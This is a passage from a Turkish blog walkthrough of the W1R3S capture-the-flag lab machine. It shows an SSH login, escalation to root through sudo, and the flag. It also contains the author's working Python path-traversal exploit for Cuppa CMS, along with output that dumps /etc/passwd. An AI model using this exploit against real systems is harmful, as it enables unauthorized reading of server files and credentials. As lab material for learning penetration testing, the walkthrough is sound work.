(https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-07-10 20:02:32\n<\/code><\/pre>\n
    Art\u0131k i\u00e7eri girebiliriz.<\/p>\n
    \u2514\u2500# ssh w1r3s@192.168.6.135\n----------------------\nThink this is the way?\n----------------------\nWell,........possibly.\n----------------------\nw1r3s@192.168.6.135's password: \nWelcome to Ubuntu 16.04.3 LTS (GNU\/Linux 4.13.0-36-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n644 packages can be updated.\n490 updates are security updates.\n\nNew release '18.04.5 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\n.....You made it huh?....\nLast login: Sat Jul 10 17:41:48 2021 from 192.168.6.132\nw1r3s@W1R3S:~$ id\nuid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\nw1r3s@W1R3S:~$ sudo su\n[sudo] password for w1r3s: \nroot@W1R3S:\/home\/w1r3s# cd \/root\nroot@W1R3S:~# ls\nflag.txt\nroot@W1R3S:~# cat flag.txt \n-----------------------------------------------------------------------------------------\n   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  \n  \/ ___\/ _ \\| \\ | |\/ ___|  _ \\    \/ \\|_   _| | | | |      \/ \\|_   _|_ _\/ _ \\| \\ | \/ ___| \n | |  | | | |  \\| | |  _| |_) |  \/ _ \\ | | | | | | |     \/ _ \\ | |  | | | | |  \\| \\___ \\ \n | |__| |_| | |\\  | |_| |  _ <  \/ ___ \\| | | |_| | |___ \/ ___ \\| |  | | |_| | |\\  |___) |\n  \\____\\___\/|_| \\_|\\____|_| \\_\\\/_\/   \\_\\_|  \\___\/|_____\/_\/   \\_\\_| |___\\___\/|_| \\_|____\/ \n\n-----------------------------------------------------------------------------------------\n\n                          .-----------------TTTT_-----_______\n                        \/''''''''''(______O] ----------____  \\______\/]_\n     __...---'"""\\_ --''   Q                               ___________@\n |'''                   ._   _______________=---------"""""""\n |                ..--''|   l L |_l   |\n |          ..--''      .  \/-___j '   '\n |    ..--''           \/  ,       '   '\n |--''                \/           `    \\\n                      L__'         \\    -\n                                    -    '-.\n                                     '.    \/\n                                       '-.\/\n\n----------------------------------------------------------------------------------------\n  YOU HAVE COMPLETED THE\n               __      __  ______________________   _________\n              \/  \\    \/  \\\/_   \\______   \\_____  \\ \/   _____\/\n              \\   \\\/\\\/   \/ |   ||       _\/ _(__  < \\_____  \\ \n               \\        \/  |   ||    |   \\\/       \\\/        \\\n                \\__\/\\  \/   |___||____|_  \/______  \/_______  \/.INC\n                     \\\/                \\\/       \\\/        \\\/        CHALLENGE, V 1.0\n----------------------------------------------------------------------------------------\n\nCREATED BY SpecterWires\n\n----------------------------------------------------------------------------------------\nroot@W1R3S:~# \n<\/code><\/pre>\n
    kullan\u0131c\u0131 sudo grubunda \ud83d\ude42<\/p>\n
    Not: Yazd\u0131\u011f\u0131m exploit a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n
    \n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# cat Cuppa_CMS_File_Inclusion.py \nimport requests\nimport urllib.parse\nfrom bs4 import BeautifulSoup\n\ndef exploit(url):\n    while(1):\n        url = url + "alerts\/alertConfigField.php"\n        path = input("[*] Enter the full path of the file you want to read.\\r\\n>> ")\n        data = {'urlConfig': '..\/'*10+path}\n        headers = {'Content-type': 'application\/x-www-form-urlencoded'}\n        print("[*] Your payload:", urllib.parse.urlencode(data))\n        r = requests.post(url, headers=headers, data=data)\n        html_doc = r.text\n        soup = BeautifulSoup(html_doc, 'html.parser')\n        print(soup.find(id="content_alert_config").text)\n\ndef main():\n    ip = input("[*] Enter the target ip adress.\\r\\n>> ")\n    list = "1. http:\/\/{0}\/\\r\\n2. http:\/\/{0}\/administator\/\\r\\n3. http:\/\/{0}\/cuppa\/\\r\\n4. Other".format(ip)\n    host = int(input("[*] The target address is similar to which of the following?\\r\\n{0}\\r\\n>> ".format(list)))\n    switcher = {\n            1: "http:\/\/{0}\/".format(ip),\n            2: "http:\/\/{0}\/administrator\/".format(ip),\n            3: "http:\/\/{0}\/cuppa\/".format(ip)\n        }\n    if(host<4 and host>0):\n        exploit(switcher.get(host))\n    elif(host == 4):\n        exploit(input("[*] Enter the URL\\r\\n>> "))\n    else:\n        print("[*] Incorrect operation")\n        exit()\nmain()\n\n"""\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# python3 Cuppa_CMS_File_Inclusion.py\n[*] Enter the target ip adress.\n>> 192.168.6.135\n[*] The target address is similar to which of the following?\n1. http:\/\/192.168.6.135\/\n2. http:\/\/192.168.6.135\/administator\/\n3. http:\/\/192.168.6.135\/cuppa\/\n4. Other\n>> 2\n[*] Enter the full path of the file you want to read.\n>> \/etc\/passwd\n[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd\n\n        root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nsyslog:x:104:108::\/home\/syslog:\/bin\/false\n_apt:x:105:65534::\/nonexistent:\/bin\/false\nmessagebus:x:106:110::\/var\/run\/dbus:\/bin\/false\nuuidd:x:107:111::\/run\/uuidd:\/bin\/false\nlightdm:x:108:114:Light Display Manager:\/var\/lib\/lightdm:\/bin\/false\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/bin\/false\ncolord:x:113:123:colord colour management daemon,,,:\/var\/lib\/colord:\/bin\/false\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/var\/run\/speech-dispatcher:\/bin\/false\nhplip:x:115:7:HPLIP system user,,,:\/var\/run\/hplip:\/bin\/false\nusbmux:x:120:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/bin\/false\nsshd:x:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nftp:x:122:129:ftp daemon,,,:\/srv\/ftp:\/bin\/false\nmysql:x:123:130:MySQL Server,,,:\/nonexistent:\/bin\/false\n"""\n\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# python3 Cuppa_CMS_File_Inclusion.py\n[*] Enter the target ip adress.\n>> 192.168.6.135\n[*] The target address is similar to which of the following?\n1. http:\/\/192.168.6.135\/\n2. http:\/\/192.168.6.135\/administator\/\n3. http:\/\/192.168.6.135\/cuppa\/\n4. Other\n>> 2\n[*] Enter the full path of the file you want to read.\n>> \/etc\/passwd\n[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd\n\n        root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nsyslog:x:104:108::\/home\/syslog:\/bin\/false\n_apt:x:105:65534::\/nonexistent:\/bin\/false\nmessagebus:x:106:110::\/var\/run\/dbus:\/bin\/false\nuuidd:x:107:111::\/run\/uuidd:\/bin\/false\nlightdm:x:108:114:Light Display Manager:\/var\/lib\/lightdm:\/bin\/false\nwhoopsie:x:109:117::\/nonexistent:\/bin\/false\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/bin\/false\navahi:x:111:120:Avahi mDNS daemon,,,:\/var\/run\/avahi-daemon:\/bin\/false\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/bin\/false\ncolord:x:113:123:colord colour management daemon,,,:\/var\/lib\/colord:\/bin\/false\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/var\/run\/speech-dispatcher:\/bin\/false\nhplip:x:115:7:HPLIP system user,,,:\/var\/run\/hplip:\/bin\/false\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:\/:\/bin\/false\npulse:x:117:124:PulseAudio daemon,,,:\/var\/run\/pulse:\/bin\/false\nrtkit:x:118:126:RealtimeKit,,,:\/proc:\/bin\/false\nsaned:x:119:127::\/var\/lib\/saned:\/bin\/false\nusbmux:x:120:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/bin\/false\nw1r3s:x:1000:1000:w1r3s,,,:\/home\/w1r3s:\/bin\/bash\nsshd:x:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nftp:x:122:129:ftp daemon,,,:\/srv\/ftp:\/bin\/false\nmysql:x:123:130:MySQL Server,,,:\/nonexistent:\/bin\/false\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
    Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked…<\/p>\n
    Devam\u0131n\u0131 okuW1R3S: 1.0.1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[559],"class_list":["post-1330","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-cuppa","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1330"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1330\/revisions"}],"predecessor-version":[{"id":1331,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1330\/revisions\/1331"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}